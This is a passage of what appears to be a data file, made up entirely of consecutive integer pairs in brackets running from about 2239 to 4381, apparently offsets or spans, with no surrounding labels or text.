,[2239,2240],[2240,2241],[2241,2242],[2242,2243],[2243,2244],[2244,2245],[2245,2246],[2246,2247],[2247,2248],[2248,2249],[2249,2250],[2250,2251],[2251,2252],[2252,2253],[2253,2254],[2254,2255],[2255,2256],[2256,2257],[2257,2258],[2258,2259],[2259,2260],[2260,2261],[2261,2262],[2262,2263],[2263,2264],[2264,2265],[2265,2266],[2266,2267],[2267,2268],[2268,2269],[2269,2270],[2270,2271],[2271,2272],[2272,2273],[2273,2274],[2274,2275],[2275,2276],[2276,2277],[2277,2278],[2278,2279],[2279,2280],[2280,2281],[2281,2282],[2282,2283],[2283,2284],[2284,2285],[2285,2286],[2286,2287],[2287,2288],[2288,2289],[2289,2290],[2290,2291],[2291,2292],[2292,2293],[2293,2294],[2294,2295],[2295,2296],[2296,2297],[2297,2298],[2298,2299],[2299,2300],[2300,2301],[2301,2302],[2302,2303],[2303,2304],[2304,2305],[2305,2306],[2306,2307],[2307,2308],[2308,2309],[2309,2310],[2310,2311],[2311,2312],[2312,2313],[2313,2314],[2314,2315],[2315,2316],[2316,2317],[2317,2318],[2318,2319],[2319,2320],[2320,2321],[2321,2322],[2322,2323],[2323,2324],[2324,2325],[2325,2326],[2326,2327],[2327,2328],[2328,2329],[2329,2330],[2330,2331],[2331,2332],[2332,2333],[2333,2334],[2334,2335],[2335,2336],[2336,2337],[2337,2338],[2338,2339],[2339,2340],[2340,2341],[2341,2342],[2342,2343],[2343,2344],[2344,2345],[2345,2346],[2346,2347],[2347,2348],[2348,2349],[2349,2350],[2350,2351],[2351,2352],[2352,2353],[2353,2354],[2354,2355],[2355,2356],[2356,2357],[2357,2358],[2358,2359],[2359,2360],[2360,2361],[2361,2362],[2362,2363],[2363,2364],[2364,2365],[2365,2366],[2366,2367],[2367,2368],[2368,2369],[2369,2370],[2370,2371],[2371,2372],[2372,2373],[2373,2374],[2374,2375],[2375,2376],[2376,2377],[2377,2378],[2378,2379],[2379,2380],[2380,2381],[2381,2382],[2382,2383],[2383,2384],[2384,2385],[2385,2386],[2386,2387],[2387,2388],[2388,2389],[2389,2390],[2390,2391],[2391,2392],[2392,2393],[2393,2394],[2394,2395],[2395,2396],[2396,2397],[2397,2398],[2398,2399],[2399,2400],[2400,2401],[2401,2402],[2402,2403],[2403,2404],[2404,2405],[2405,2406],[2406,2407],[2407,2408],[2408,2409],[2409,2410],[2410,2411],[2411,2412],[2412,2413],[2413,2414],[2414,2415],[2415,2416],[2416,2417],[2417,2418],[2418,2419],[2419,2420],[2420,2421],[2421,2422],[2422,2423],[2423,2424],[2424,2425],[2425,2426],[2426,2427],[2427,2428],[2428,2429],[2429,2430],[2430,2431],[2431,2432],[2432,2433],[2433,2434],[2434,2435],[2435,2436],[2436,2437],[2437,2438],[2438,2439],[2439,2440],[2440,2441],[2441,2442],[2442,2443],[2443,2444],[2444,2445],[2445,2446],[2446,2447],[2447,2448],[2448,2449],[2449,2450],[2450,2451],[2451,2452],[2452,2453],[2453,2454],[2454,2455],[2455,2456],[2456,2457],[2457,2458],[2458,2459],[2459,2460],[2460,2461],[2461,2462],[2462,2463],[2463,2464],[2464,2465],[2465,2466],[2466,2467],[2467,2468],[2468,2469],[2469,2470],[2470,2471],[2471,2472],[2472,2473],[2473,2474],[2474,2475],[2475,2476],[2476,2477],[2477,2478],[2478,2479],[2479,2480],[2480,2481],[2481,2482],[2482,2483],[2483,2484],[2484,2485],[2485,2486],[2486,2487],[2487,2488],[2488,2489],[2489,2490],[2490,2491],[2491,2492],[2492,2493],[2493,2494],[2494,2495],[2495,2496],[2496,2497],[2497,2498],[2498,2499],[2499,2500],[2500,2501],[2501,2502],[2502,2503],[2503,2504],[2504,2505],[2505,2506],[2506,2507],[2507,2508],[2508,2509],[2509,2510],[2510,2511],[2511,2512],[2512,2513],[2513,2514],[2514,2515],[2515,2516],[2516,2517],[2517,2518],[2518,2519],[2519,2520],[2520,2521],[2521,2522],[2522,2523],[2523,2524],[2524,2525],[2525,2526],[2526,2527],[2527,2528],[2528,2529],[2529,2530],[2530,2531],[2531,2532],[2532,2533],[2533,2534],[2534,2535],[2535,2536],[2536,2537],[2537,2538],[2538,2539],[2539,2540],[2540,2541],[2541,2542],[2542,2543],[2543,2544],[2544,2545],[2545,2546],[2546,2547],[2547,2548],[2548,2549],[2549,2550],[2550,2551],[2551,2552],[2552,2553],[2553,2554],[2554,2555],[2555,2556],[2556,2557],[2557,2558],[2558,2559],[2559,2560],[2560,2561],[2561,2562],[2562,2563],[2563,2564],[2564,2565],[2565,2566],[2566,2567],[2567,2568],[2568,2569],[2569,2570],[2570,2571],[2571,2572],[2572,2573],[2573,2574],[2574,2575],[2575,2576],[2576,2577],[2577,2578],[2578,2579],[2579,2580],[2580,2581],[2581,2582],[2582,2583],[2583,2584],[2584,2585],[2585,2586],[2586,2587],[2587,2588],[2588,2589],[2589,2590],[2590,2591],[2591,2592],[2592,2593],[2593,2594],[2594,2595],[2595,2596],[2596,2597],[2597,2598],[2598,2599],[2599,2600],[2600,2601],[2601,2602],[2602,2603],[2603,2604],[2604,2605],[2605,2606],[2606,2607],[2607,2608],[2608,2609],[2609,2610],[2610,2611],[2611,2612],[2612,2613],[2613,2614],[2614,2615],[2615,2616],[2616,2617],[2617,2618],[2618,2619],[2619,2620],[2620,2621],[2621,2622],[2622,2623],[2623,2624],[2624,2625],[2625,2626],[2626,2627],[2627,2628],[2628,2629],[2629,2630],[2630,2631],[2631,2632],[2632,2633],[2633,2634],[2634,2635],[2635,2636],[2636,2637],[2637,2638],[2638,2639],[2639,2640],[2640,2641],[2641,2642],[2642,2643],[2643,2644],[2644,2645],[2645,2646],[2646,2647],[2647,2648],[2648,2649],[2649,2650],[2650,2651],[2651,2652],[2652,2653],[2653,2654],[2654,2655],[2655,2656],[2656,2657],[2657,2658],[2658,2659],[2659,2660],[2660,2661],[2661,2662],[2662,2663],[2663,2664],[2664,2665],[2665,2666],[2666,2667],[2667,2668],[2668,2669],[2669,2670],[2670,2671],[2671,2672],[2672,2673],[2673,2674],[2674,2675],[2675,2676],[2676,2677],[2677,2678],[2678,2679],[2679,2680],[2680,2681],[2681,2682],[2682,2683],[2683,2684],[2684,2685],[2685,2686],[2686,2687],[2687,2688],[2688,2689],[2689,2690],[2690,2691],[2691,2692],[2692,2693],[2693,2694],[2694,2695],[2695,2696],[2696,2697],[2697,2698],[2698,2699],[2699,2700],[2700,2701],[2701,2702],[2702,2703],[2703,2704],[2704,2705],[2705,2706],[2706,2707],[2707,2708],[2708,2709],[2709,2710],[2710,2711],[2711,2712],[2712,2713],[2713,2714],[2714,2715],[2715,2716],[2716,2717],[2717,2718],[2718,2719],[2719,2720],[2720,2721],[2721,2722],[2722,2723],[2723,2724],[2724,2725],[2725,2726],[2726,2727],[2727,2728],[2728,2729],[2729,2730],[2730,2731],[2731,2732],[2732,2733],[2733,2734],[2734,2735],[2735,2736],[2736,2737],[2737,2738],[2738,2739],[2739,2740],[2740,2741],[2741,2742],[2742,2743],[2743,2744],[2744,2745],[2745,2746],[2746,2747],[2747,2748],[2748,2749],[2749,2750],[2750,2751],[2751,2752],[2752,2753],[2753,2754],[2754,2755],[2755,2756],[2756,2757],[2757,2758],[2758,2759],[2759,2760],[2760,2761],[2761,2762],[2762,2763],[2763,2764],[2764,2765],[2765,2766],[2766,2767],[2767,2768],[2768,2769],[2769,2770],[2770,2771],[2771,2772],[2772,2773],[2773,2774],[2774,2775],[2775,2776],[2776,2777],[2777,2778],[2778,2779],[2779,2780],[2780,2781],[2781,2782],[2782,2783],[2783,2784],[2784,2785],[2785,2786],[2786,2787],[2787,2788],[2788,2789],[2789,2790],[2790,2791],[2791,2792],[2792,2793],[2793,2794],[2794,2795],[2795,2796],[2796,2797],[2797,2798],[2798,2799],[2799,2800],[2800,2801],[2801,2802],[2802,2803],[2803,2804],[2804,2805],[2805,2806],[2806,2807],[2807,2808],[2808,2809],[2809,2810],[2810,2811],[2811,2812],[2812,2813],[2813,2814],[2814,2815],[2815,2816],[2816,2817],[2817,2818],[2818,2819],[2819,2820],[2820,2821],[2821,2822],[2822,2823],[2823,2824],[2824,2825],[2825,2826],[2826,2827],[2827,2828],[2828,2829],[2829,2830],[2830,2831],[2831,2832],[2832,2833],[2833,2834],[2834,2835],[2835,2836],[2836,2837],[2837,2838],[2838,2839],[2839,2840],[2840,2841],[2841,2842],[2842,2843],[2843,2844],[2844,2845],[2845,2846],[2846,2847],[2847,2848],[2848,2849],[2849,2850],[2850,2851],[2851,2852],[2852,2853],[2853,2854],[2854,2855],[2855,2856],[2856,2857],[2857,2858],[2858,2859],[2859,2860],[2860,2861],[2861,2862],[2862,2863],[2863,2864],[2864,2865],[2865,2866],[2866,2867],[2867,2868],[2868,2869],[2869,2870],[2870,2871],[2871,2872],[2872,2873],[2873,2874],[2874,2875],[2875,2876],[2876,2877],[2877,2878],[2878,2879],[2879,2880],[2880,2881],[2881,2882],[2882,2883],[2883,2884],[2884,2885],[2885,2886],[2886,2887],[2887,2888],[2888,2889],[2889,2890],[2890,2891],[2891,2892],[2892,2893],[2893,2894],[2894,2895],[2895,2896],[2896,2897],[2897,2898],[2898,2899],[2899,2900],[2900,2901],[2901,2902],[2902,2903],[2903,2904],[2904,2905],[2905,2906],[2906,2907],[2907,2908],[2908,2909],[2909,2910],[2910,2911],[2911,2912],[2912,2913],[2913,2914],[2914,2915],[2915,2916],[2916,2917],[2917,2918],[2918,2919],[2919,2920],[2920,2921],[2921,2922],[2922,2923],[2923,2924],[2924,2925],[2925,2926],[2926,2927],[2927,2928],[2928,2929],[2929,2930],[2930,2931],[2931,2932],[2932,2933],[2933,2934],[2934,2935],[2935,2936],[2936,2937],[2937,2938],[2938,2939],[2939,2940],[2940,2941],[2941,2942],[2942,2943],[2943,2944],[2944,2945],[2945,2946],[2946,2947],[2947,2948],[2948,2949],[2949,2950],[2950,2951],[2951,2952],[2952,2953],[2953,2954],[2954,2955],[2955,2956],[2956,2957],[2957,2958],[2958,2959],[2959,2960],[2960,2961],[2961,2962],[2962,2963],[2963,2964],[2964,2965],[2965,2966],[2966,2967],[2967,2968],[2968,2969],[2969,2970],[2970,2971],[2971,2972],[2972,2973],[2973,2974],[2974,2975],[2975,2976],[2976,2977],[2977,2978],[2978,2979],[2979,2980],[2980,2981],[2981,2982],[2982,2983],[2983,2984],[2984,2985],[2985,2986],[2986,2987],[2987,2988],[2988,2989],[2989,2990],[2990,2991],[2991,2992],[2992,2993],[2993,2994],[2994,2995],[2995,2996],[2996,2997],[2997,2998],[2998,2999],[2999,3000],[3000,3001],[3001,3002],[3002,3003],[3003,3004],[3004,3005],[3005,3006],[3006,3007],[3007,3008],[3008,3009],[3009,3010],[3010,3011],[3011,3012],[3012,3013],[3013,3014],[3014,3015],[3015,3016],[3016,3017],[3017,3018],[3018,3019],[3019,3020],[3020,3021],[3021,3022],[3022,3023],[3023,3024],[3024,3025],[3025,3026],[3026,3027],[3027,3028],[3028,3029],[3029,3030],[3030,3031],[3031,3032],[3032,3033],[3033,3034],[3034,3035],[3035,3036],[3036,3037],[3037,3038],[3038,3039],[3039,3040],[3040,3041],[3041,3042],[3042,3043],[3043,3044],[3044,3045],[3045,3046],[3046,3047],[3047,3048],[3048,3049],[3049,3050],[3050,3051],[3051,3052],[3052,3053],[3053,3054],[3054,3055],[3055,3056],[3056,3057],[3057,3058],[3058,3059],[3059,3060],[3060,3061],[3061,3062],[3062,3063],[3063,3064],[3064,3065],[3065,3066],[3066,3067],[3067,3068],[3068,3069],[3069,3070],[3070,3071],[3071,3072],[3072,3073],[3073,3074],[3074,3075],[3075,3076],[3076,3077],[3077,3078],[3078,3079],[3079,3080],[3080,3081],[3081,3082],[3082,3083],[3083,3084],[3084,3085],[3085,3086],[3086,3087],[3087,3088],[3088,3089],[3089,3090],[3090,3091],[3091,3092],[3092,3093],[3093,3094],[3094,3095],[3095,3096],[3096,3097],[3097,3098],[3098,3099],[3099,3100],[3100,3101],[3101,3102],[3102,3103],[3103,3104],[3104,3105],[3105,3106],[3106,3107],[3107,3108],[3108,3109],[3109,3110],[3110,3111],[3111,3112],[3112,3113],[3113,3114],[3114,3115],[3115,3116],[3116,3117],[3117,3118],[3118,3119],[3119,3120],[3120,3121],[3121,3122],[3122,3123],[3123,3124],[3124,3125],[3125,3126],[3126,3127],[3127,3128],[3128,3129],[3129,3130],[3130,3131],[3131,3132],[3132,3133],[3133,3134],[3134,3135],[3135,3136],[3136,3137],[3137,3138],[3138,3139],[3139,3140],[3140,3141],[3141,3142],[3142,3143],[3143,3144],[3144,3145],[3145,3146],[3146,3147],[3147,3148],[3148,3149],[3149,3150],[3150,3151],[3151,3152],[3152,3153],[3153,3154],[3154,3155],[3155,3156],[3156,3157],[3157,3158],[3158,3159],[3159,3160],[3160,3161],[3161,3162],[3162,3163],[3163,3164],[3164,3165],[3165,3166],[3166,3167],[3167,3168],[3168,3169],[3169,3170],[3170,3171],[3171,3172],[3172,3173],[3173,3174],[3174,3175],[3175,3176],[3176,3177],[3177,3178],[3178,3179],[3179,3180],[3180,3181],[3181,3182],[3182,3183],[3183,3184],[3184,3185],[3185,3186],[3186,3187],[3187,3188],[3188,3189],[3189,3190],[3190,3191],[3191,3192],[3192,3193],[3193,3194],[3194,3195],[3195,3196],[3196,3197],[3197,3198],[3198,3199],[3199,3200],[3200,3201],[3201,3202],[3202,3203],[3203,3204],[3204,3205],[3205,3206],[3206,3207],[3207,3208],[3208,3209],[3209,3210],[3210,3211],[3211,3212],[3212,3213],[3213,3214],[3214,3215],[3215,3216],[3216,3217],[3217,3218],[3218,3219],[3219,3220],[3220,3221],[3221,3222],[3222,3223],[3223,3224],[3224,3225],[3225,3226],[3226,3227],[3227,3228],[3228,3229],[3229,3230],[3230,3231],[3231,3232],[3232,3233],[3233,3234],[3234,3235],[3235,3236],[3236,3237],[3237,3238],[3238,3239],[3239,3240],[3240,3241],[3241,3242],[3242,3243],[3243,3244],[3244,3245],[3245,3246],[3246,3247],[3247,3248],[3248,3249],[3249,3250],[3250,3251],[3251,3252],[3252,3253],[3253,3254],[3254,3255],[3255,3256],[3256,3257],[3257,3258],[3258,3259],[3259,3260],[3260,3261],[3261,3262],[3262,3263],[3263,3264],[3264,3265],[3265,3266],[3266,3267],[3267,3268],[3268,3269],[3269,3270],[3270,3271],[3271,3272],[3272,3273],[3273,3274],[3274,3275],[3275,3276],[3276,3277],[3277,3278],[3278,3279],[3279,3280],[3280,3281],[3281,3282],[3282,3283],[3283,3284],[3284,3285],[3285,3286],[3286,3287],[3287,3288],[3288,3289],[3289,3290],[3290,3291],[3291,3292],[3292,3293],[3293,3294],[3294,3295],[3295,3296],[3296,3297],[3297,3298],[3298,3299],[3299,3300],[3300,3301],[3301,3302],[3302,3303],[3303,3304],[3304,3305],[3305,3306],[3306,3307],[3307,3308],[3308,3309],[3309,3310],[3310,3311],[3311,3312],[3312,3313],[3313,3314],[3314,3315],[3315,3316],[3316,3317],[3317,3318],[3318,3319],[3319,3320],[3320,3321],[3321,3322],[3322,3323],[3323,3324],[3324,3325],[3325,3326],[3326,3327],[3327,3328],[3328,3329],[3329,3330],[3330,3331],[3331,3332],[3332,3333],[3333,3334],[3334,3335],[3335,3336],[3336,3337],[3337,3338],[3338,3339],[3339,3340],[3340,3341],[3341,3342],[3342,3343],[3343,3344],[3344,3345],[3345,3346],[3346,3347],[3347,3348],[3348,3349],[3349,3350],[3350,3351],[3351,3352],[3352,3353],[3353,3354],[3354,3355],[3355,3356],[3356,3357],[3357,3358],[3358,3359],[3359,3360],[3360,3361],[3361,3362],[3362,3363],[3363,3364],[3364,3365],[3365,3366],[3366,3367],[3367,3368],[3368,3369],[3369,3370],[3370,3371],[3371,3372],[3372,3373],[3373,3374],[3374,3375],[3375,3376],[3376,3377],[3377,3378],[3378,3379],[3379,3380],[3380,3381],[3381,3382],[3382,3383],[3383,3384],[3384,3385],[3385,3386],[3386,3387],[3387,3388],[3388,3389],[3389,3390],[3390,3391],[3391,3392],[3392,3393],[3393,3394],[3394,3395],[3395,3396],[3396,3397],[3397,3398],[3398,3399],[3399,3400],[3400,3401],[3401,3402],[3402,3403],[3403,3404],[3404,3405],[3405,3406],[3406,3407],[3407,3408],[3408,3409],[3409,3410],[3410,3411],[3411,3412],[3412,3413],[3413,3414],[3414,3415],[3415,3416],[3416,3417],[3417,3418],[3418,3419],[3419,3420],[3420,3421],[3421,3422],[3422,3423],[3423,3424],[3424,3425],[3425,3426],[3426,3427],[3427,3428],[3428,3429],[3429,3430],[3430,3431],[3431,3432],[3432,3433],[3433,3434],[3434,3435],[3435,3436],[3436,3437],[3437,3438],[3438,3439],[3439,3440],[3440,3441],[3441,3442],[3442,3443],[3443,3444],[3444,3445],[3445,3446],[3446,3447],[3447,3448],[3448,3449],[3449,3450],[3450,3451],[3451,3452],[3452,3453],[3453,3454],[3454,3455],[3455,3456],[3456,3457],[3457,3458],[3458,3459],[3459,3460],[3460,3461],[3461,3462],[3462,3463],[3463,3464],[3464,3465],[3465,3466],[3466,3467],[3467,3468],[3468,3469],[3469,3470],[3470,3471],[3471,3472],[3472,3473],[3473,3474],[3474,3475],[3475,3476],[3476,3477],[3477,3478],[3478,3479],[3479,3480],[3480,3481],[3481,3482],[3482,3483],[3483,3484],[3484,3485],[3485,3486],[3486,3487],[3487,3488],[3488,3489],[3489,3490],[3490,3491],[3491,3492],[3492,3493],[3493,3494],[3494,3495],[3495,3496],[3496,3497],[3497,3498],[3498,3499],[3499,3500],[3500,3501],[3501,3502],[3502,3503],[3503,3504],[3504,3505],[3505,3506],[3506,3507],[3507,3508],[3508,3509],[3509,3510],[3510,3511],[3511,3512],[3512,3513],[3513,3514],[3514,3515],[3515,3516],[3516,3517],[3517,3518],[3518,3519],[3519,3520],[3520,3521],[3521,3522],[3522,3523],[3523,3524],[3524,3525],[3525,3526],[3526,3527],[3527,3528],[3528,3529],[3529,3530],[3530,3531],[3531,3532],[3532,3533],[3533,3534],[3534,3535],[3535,3536],[3536,3537],[3537,3538],[3538,3539],[3539,3540],[3540,3541],[3541,3542],[3542,3543],[3543,3544],[3544,3545],[3545,3546],[3546,3547],[3547,3548],[3548,3549],[3549,3550],[3550,3551],[3551,3552],[3552,3553],[3553,3554],[3554,3555],[3555,3556],[3556,3557],[3557,3558],[3558,3559],[3559,3560],[3560,3561],[3561,3562],[3562,3563],[3563,3564],[3564,3565],[3565,3566],[3566,3567],[3567,3568],[3568,3569],[3569,3570],[3570,3571],[3571,3572],[3572,3573],[3573,3574],[3574,3575],[3575,3576],[3576,3577],[3577,3578],[3578,3579],[3579,3580],[3580,3581],[3581,3582],[3582,3583],[3583,3584],[3584,3585],[3585,3586],[3586,3587],[3587,3588],[3588,3589],[3589,3590],[3590,3591],[3591,3592],[3592,3593],[3593,3594],[3594,3595],[3595,3596],[3596,3597],[3597,3598],[3598,3599],[3599,3600],[3600,3601],[3601,3602],[3602,3603],[3603,3604],[3604,3605],[3605,3606],[3606,3607],[3607,3608],[3608,3609],[3609,3610],[3610,3611],[3611,3612],[3612,3613],[3613,3614],[3614,3615],[3615,3616],[3616,3617],[3617,3618],[3618,3619],[3619,3620],[3620,3621],[3621,3622],[3622,3623],[3623,3624],[3624,3625],[3625,3626],[3626,3627],[3627,3628],[3628,3629],[3629,3630],[3630,3631],[3631,3632],[3632,3633],[3633,3634],[3634,3635],[3635,3636],[3636,3637],[3637,3638],[3638,3639],[3639,3640],[3640,3641],[3641,3642],[3642,3643],[3643,3644],[3644,3645],[3645,3646],[3646,3647],[3647,3648],[3648,3649],[3649,3650],[3650,3651],[3651,3652],[3652,3653],[3653,3654],[3654,3655],[3655,3656],[3656,3657],[3657,3658],[3658,3659],[3659,3660],[3660,3661],[3661,3662],[3662,3663],[3663,3664],[3664,3665],[3665,3666],[3666,3667],[3667,3668],[3668,3669],[3669,3670],[3670,3671],[3671,3672],[3672,3673],[3673,3674],[3674,3675],[3675,3676],[3676,3677],[3677,3678],[3678,3679],[3679,3680],[3680,3681],[3681,3682],[3682,3683],[3683,3684],[3684,3685],[3685,3686],[3686,3687],[3687,3688],[3688,3689],[3689,3690],[3690,3691],[3691,3692],[3692,3693],[3693,3694],[3694,3695],[3695,3696],[3696,3697],[3697,3698],[3698,3699],[3699,3700],[3700,3701],[3701,3702],[3702,3703],[3703,3704],[3704,3705],[3705,3706],[3706,3707],[3707,3708],[3708,3709],[3709,3710],[3710,3711],[3711,3712],[3712,3713],[3713,3714],[3714,3715],[3715,3716],[3716,3717],[3717,3718],[3718,3719],[3719,3720],[3720,3721],[3721,3722],[3722,3723],[3723,3724],[3724,3725],[3725,3726],[3726,3727],[3727,3728],[3728,3729],[3729,3730],[3730,3731],[3731,3732],[3732,3733],[3733,3734],[3734,3735],[3735,3736],[3736,3737],[3737,3738],[3738,3739],[3739,3740],[3740,3741],[3741,3742],[3742,3743],[3743,3744],[3744,3745],[3745,3746],[3746,3747],[3747,3748],[3748,3749],[3749,3750],[3750,3751],[3751,3752],[3752,3753],[3753,3754],[3754,3755],[3755,3756],[3756,3757],[3757,3758],[3758,3759],[3759,3760],[3760,3761],[3761,3762],[3762,3763],[3763,3764],[3764,3765],[3765,3766],[3766,3767],[3767,3768],[3768,3769],[3769,3770],[3770,3771],[3771,3772],[3772,3773],[3773,3774],[3774,3775],[3775,3776],[3776,3777],[3777,3778],[3778,3779],[3779,3780],[3780,3781],[3781,3782],[3782,3783],[3783,3784],[3784,3785],[3785,3786],[3786,3787],[3787,3788],[3788,3789],[3789,3790],[3790,3791],[3791,3792],[3792,3793],[3793,3794],[3794,3795],[3795,3796],[3796,3797],[3797,3798],[3798,3799],[3799,3800],[3800,3801],[3801,3802],[3802,3803],[3803,3804],[3804,3805],[3805,3806],[3806,3807],[3807,3808],[3808,3809],[3809,3810],[3810,3811],[3811,3812],[3812,3813],[3813,3814],[3814,3815],[3815,3816],[3816,3817],[3817,3818],[3818,3819],[3819,3820],[3820,3821],[3821,3822],[3822,3823],[3823,3824],[3824,3825],[3825,3826],[3826,3827],[3827,3828],[3828,3829],[3829,3830],[3830,3831],[3831,3832],[3832,3833],[3833,3834],[3834,3835],[3835,3836],[3836,3837],[3837,3838],[3838,3839],[3839,3840],[3840,3841],[3841,3842],[3842,3843],[3843,3844],[3844,3845],[3845,3846],[3846,3847],[3847,3848],[3848,3849],[3849,3850],[3850,3851],[3851,3852],[3852,3853],[3853,3854],[3854,3855],[3855,3856],[3856,3857],[3857,3858],[3858,3859],[3859,3860],[3860,3861],[3861,3862],[3862,3863],[3863,3864],[3864,3865],[3865,3866],[3866,3867],[3867,3868],[3868,3869],[3869,3870],[3870,3871],[3871,3872],[3872,3873],[3873,3874],[3874,3875],[3875,3876],[3876,3877],[3877,3878],[3878,3879],[3879,3880],[3880,3881],[3881,3882],[3882,3883],[3883,3884],[3884,3885],[3885,3886],[3886,3887],[3887,3888],[3888,3889],[3889,3890],[3890,3891],[3891,3892],[3892,3893],[3893,3894],[3894,3895],[3895,3896],[3896,3897],[3897,3898],[3898,3899],[3899,3900],[3900,3901],[3901,3902],[3902,3903],[3903,3904],[3904,3905],[3905,3906],[3906,3907],[3907,3908],[3908,3909],[3909,3910],[3910,3911],[3911,3912],[3912,3913],[3913,3914],[3914,3915],[3915,3916],[3916,3917],[3917,3918],[3918,3919],[3919,3920],[3920,3921],[3921,3922],[3922,3923],[3923,3924],[3924,3925],[3925,3926],[3926,3927],[3927,3928],[3928,3929],[3929,3930],[3930,3931],[3931,3932],[3932,3933],[3933,3934],[3934,3935],[3935,3936],[3936,3937],[3937,3938],[3938,3939],[3939,3940],[3940,3941],[3941,3942],[3942,3943],[3943,3944],[3944,3945],[3945,3946],[3946,3947],[3947,3948],[3948,3949],[3949,3950],[3950,3951],[3951,3952],[3952,3953],[3953,3954],[3954,3955],[3955,3956],[3956,3957],[3957,3958],[3958,3959],[3959,3960],[3960,3961],[3961,3962],[3962,3963],[3963,3964],[3964,3965],[3965,3966],[3966,3967],[3967,3968],[3968,3969],[3969,3970],[3970,3971],[3971,3972],[3972,3973],[3973,3974],[3974,3975],[3975,3976],[3976,3977],[3977,3978],[3978,3979],[3979,3980],[3980,3981],[3981,3982],[3982,3983],[3983,3984],[3984,3985],[3985,3986],[3986,3987],[3987,3988],[3988,3989],[3989,3990],[3990,3991],[3991,3992],[3992,3993],[3993,3994],[3994,3995],[3995,3996],[3996,3997],[3997,3998],[3998,3999],[3999,4000],[4000,4001],[4001,4002],[4002,4003],[4003,4004],[4004,4005],[4005,4006],[4006,4007],[4007,4008],[4008,4009],[4009,4010],[4010,4011],[4011,4012],[4012,4013],[4013,4014],[4014,4015],[4015,4016],[4016,4017],[4017,4018],[4018,4019],[4019,4020],[4020,4021],[4021,4022],[4022,4023],[4023,4024],[4024,4025],[4025,4026],[4026,4027],[4027,4028],[4028,4029],[4029,4030],[4030,4031],[4031,4032],[4032,4033],[4033,4034],[4034,4035],[4035,4036],[4036,4037],[4037,4038],[4038,4039],[4039,4040],[4040,4041],[4041,4042],[4042,4043],[4043,4044],[4044,4045],[4045,4046],[4046,4047],[4047,4048],[4048,4049],[4049,4050],[4050,4051],[4051,4052],[4052,4053],[4053,4054],[4054,4055],[4055,4056],[4056,4057],[4057,4058],[4058,4059],[4059,4060],[4060,4061],[4061,4062],[4062,4063],[4063,4064],[4064,4065],[4065,4066],[4066,4067],[4067,4068],[4068,4069],[4069,4070],[4070,4071],[4071,4072],[4072,4073],[4073,4074],[4074,4075],[4075,4076],[4076,4077],[4077,4078],[4078,4079],[4079,4080],[4080,4081],[4081,4082],[4082,4083],[4083,4084],[4084,4085],[4085,4086],[4086,4087],[4087,4088],[4088,4089],[4089,4090],[4090,4091],[4091,4092],[4092,4093],[4093,4094],[4094,4095],[4095,4096],[4096,4097],[4097,4098],[4098,4099],[4099,4100],[4100,4101],[4101,4102],[4102,4103],[4103,4104],[4104,4105],[4105,4106],[4106,4107],[4107,4108],[4108,4109],[4109,4110],[4110,4111],[4111,4112],[4112,4113],[4113,4114],[4114,4115],[4115,4116],[4116,4117],[4117,4118],[4118,4119],[4119,4120],[4120,4121],[4121,4122],[4122,4123],[4123,4124],[4124,4125],[4125,4126],[4126,4127],[4127,4128],[4128,4129],[4129,4130],[4130,4131],[4131,4132],[4132,4133],[4133,4134],[4134,4135],[4135,4136],[4136,4137],[4137,4138],[4138,4139],[4139,4140],[4140,4141],[4141,4142],[4142,4143],[4143,4144],[4144,4145],[4145,4146],[4146,4147],[4147,4148],[4148,4149],[4149,4150],[4150,4151],[4151,4152],[4152,4153],[4153,4154],[4154,4155],[4155,4156],[4156,4157],[4157,4158],[4158,4159],[4159,4160],[4160,4161],[4161,4162],[4162,4163],[4163,4164],[4164,4165],[4165,4166],[4166,4167],[4167,4168],[4168,4169],[4169,4170],[4170,4171],[4171,4172],[4172,4173],[4173,4174],[4174,4175],[4175,4176],[4176,4177],[4177,4178],[4178,4179],[4179,4180],[4180,4181],[4181,4182],[4182,4183],[4183,4184],[4184,4185],[4185,4186],[4186,4187],[4187,4188],[4188,4189],[4189,4190],[4190,4191],[4191,4192],[4192,4193],[4193,4194],[4194,4195],[4195,4196],[4196,4197],[4197,4198],[4198,4199],[4199,4200],[4200,4201],[4201,4202],[4202,4203],[4203,4204],[4204,4205],[4205,4206],[4206,4207],[4207,4208],[4208,4209],[4209,4210],[4210,4211],[4211,4212],[4212,4213],[4213,4214],[4214,4215],[4215,4216],[4216,4217],[4217,4218],[4218,4219],[4219,4220],[4220,4221],[4221,4222],[4222,4223],[4223,4224],[4224,4225],[4225,4226],[4226,4227],[4227,4228],[4228,4229],[4229,4230],[4230,4231],[4231,4232],[4232,4233],[4233,4234],[4234,4235],[4235,4236],[4236,4237],[4237,4238],[4238,4239],[4239,4240],[4240,4241],[4241,4242],[4242,4243],[4243,4244],[4244,4245],[4245,4246],[4246,4247],[4247,4248],[4248,4249],[4249,4250],[4250,4251],[4251,4252],[4252,4253],[4253,4254],[4254,4255],[4255,4256],[4256,4257],[4257,4258],[4258,4259],[4259,4260],[4260,4261],[4261,4262],[4262,4263],[4263,4264],[4264,4265],[4265,4266],[4266,4267],[4267,4268],[4268,4269],[4269,4270],[4270,4271],[4271,4272],[4272,4273],[4273,4274],[4274,4275],[4275,4276],[4276,4277],[4277,4278],[4278,4279],[4279,4280],[4280,4281],[4281,4282],[4282,4283],[4283,4284],[4284,4285],[4285,4286],[4286,4287],[4287,4288],[4288,4289],[4289,4290],[4290,4291],[4291,4292],[4292,4293],[4293,4294],[4294,4295],[4295,4296],[4296,4297],[4297,4298],[4298,4299],[4299,4300],[4300,4301],[4301,4302],[4302,4303],[4303,4304],[4304,4305],[4305,4306],[4306,4307],[4307,4308],[4308,4309],[4309,4310],[4310,4311],[4311,4312],[4312,4313],[4313,4314],[4314,4315],[4315,4316],[4316,4317],[4317,4318],[4318,4319],[4319,4320],[4320,4321],[4321,4322],[4322,4323],[4323,4324],[4324,4325],[4325,4326],[4326,4327],[4327,4328],[4328,4329],[4329,4330],[4330,4331],[4331,4332],[4332,4333],[4333,4334],[4334,4335],[4335,4336],[4336,4337],[4337,4338],[4338,4339],[4339,4340],[4340,4341],[4341,4342],[4342,4343],[4343,4344],[4344,4345],[4345,4346],[4346,4347],[4347,4348],[4348,4349],[4349,4350],[4350,4351],[4351,4352],[4352,4353],[4353,4354],[4354,4355],[4355,4356],[4356,4357],[4357,4358],[4358,4359],[4359,4360],[4360,4361],[4361,4362],[4362,4363],[4363,4364],[4364,4365],[4365,4366],[4366,4367],[4367,4368],[4368,4369],[4369,4370],[4370,4371],[4371,4372],[4372,4373],[4373,4374],[4374,4375],[4375,4376],[4376,4377],[4377,4378],[4378,4379],[4379,4380],[4380,4381],[4381,4